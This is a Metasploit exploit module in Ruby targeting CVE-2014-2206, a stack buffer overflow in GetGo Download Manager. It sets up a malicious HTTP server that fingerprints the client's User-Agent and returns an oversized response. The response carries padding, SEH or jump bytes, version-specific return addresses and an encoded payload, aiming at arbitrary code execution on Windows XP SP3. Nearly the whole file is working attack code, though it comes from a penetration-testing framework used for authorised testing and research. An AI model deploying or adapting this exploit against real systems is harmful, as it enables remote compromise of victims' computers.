## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in GetGo Download Manager version 5.3.0.2712 earlier, caused by an overly long HTTP response header. By persuading the victim to download a file from a malicious server, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Julien Ahrens', # Vulnerability discovery 'Gabor Seljan', # Metasploit module for v4 'bzyo', # Metasploit module for v5 'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642) ], 'References' => [ [ 'EDB', '32132' ], [ 'OSVDB', '103910' ], [ 'CVE', '2014-2206' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'URIPATH' => "/shakeitoff.mp3" }, 'Platform' => 'win', 'Payload' => { # v5 has no bad chars 'BadChars' => "\x00\x0a\x0d" }, 'Targets' => [ [ 'Automatic', {} ], [ '4.9.0.1982 on Windows XP SP3', { 'Offset' => 4107, 'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30] } ], [ '5.3.0.2712 on Windows XP SP3', { 'Offset' => 4095, # 0:016> u 0x72d11f39 # msacm32!wodMessage+0xd0f: # 72d11f39 5f pop edi # 72d11f3a 5e pop esi # 72d11f3b c20400 ret 4 'Ret' => 0x72d11f39, # 12253 is the same size the python PoC used 'MaxSize' => 12253 } ] ], 'Privileged' => false, 'DisclosureDate' => '2014-03-09', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) end # This part is from Gabor Seljan def exploit_v4(cli, current_taget) sploit = rand_text_alpha(current_taget['Offset']) sploit << "\x90\x90\xEB\x06" sploit << [current_taget.ret].pack('V') sploit << payload.encoded print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...") resp = create_response(200, sploit) resp.body = "" cli.send_response(resp) end # This part is from Auxilus with some help from @_sinn3r def exploit_v5(cli, current_taget) seh_record = generate_seh_record(current_taget.ret) # Minus 4 for the SEH record buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4) buffer << seh_record buffer << payload.encoded buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length) res = create_response(200, buffer) cli.send_response(res) end def on_request_uri(cli, request) print_status("#{cli.peerhost} connected") current_target = target user_agent = request.headers['User-Agent'].to_s if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/) print_status('Attempting to exploit against v4') current_target = targets[1] exploit_v4(cli, current_target) elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/) print_status('Attempting to exploit against v5') current_target = targets[2] exploit_v5(cli, current_target) else print_error('Sending 404 for unknown user-agent') send_not_found(cli) end end end